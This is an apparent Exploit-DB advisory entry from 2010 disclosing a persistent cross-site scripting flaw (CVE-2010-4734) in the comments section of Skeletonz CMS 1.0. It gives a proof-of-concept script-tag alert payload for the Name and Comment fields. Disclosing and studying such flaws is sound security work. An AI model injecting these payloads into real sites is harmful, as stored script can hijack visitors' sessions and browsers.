Skeletonz CMS - Persistent Cross-Site Scripting
Author: Jbyte type: webapps platform: cgi port: date_added: 2010-11-28 date_updated: 2010-11-28 verified: 0 codes: OSVDB-69514;CVE-2010-4734 tags: aliases: screenshot_url: application_url: http://www.exploit-db.comskeletonz1_0.zip raw file: 15625.txt
# Exploit Title: Xss on skeletonz-simple dynamic cms in the section comments # Google Dork: # Date: 27/11/10 # Author: Jordan Diaz aka Jbyte # Software Link: http://orangoo.com/skeletonz/ # Version: 1.0 # Tested on: Windows xp # CVE : The follow xss is located in the section of comments of the CMS skeletonz Xss Exploit field Name: <script>alert('xss');</script>field Comment: <script>alert('xss');</script>